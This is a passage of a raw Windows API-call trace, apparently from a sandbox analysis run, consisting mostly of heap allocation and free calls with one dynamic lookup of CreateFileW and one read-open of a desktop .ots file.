RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0122.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0122.580] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0122.580] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0122.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0122.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.581] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0122.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.582] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.582] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0122.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0122.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0122.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0122.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0122.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.585] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0122.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0122.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca838, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0122.585] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.586] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0122.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0122.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0122.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0122.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0122.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.586] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0122.586] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\cSg8 emhaX_r.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\csg8 emhax_r.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0122.587] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.588] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.588] FreeLibrary (hLibModule=0x772d0000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0122.589] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0122.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.590] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.590] HeapFree (in: 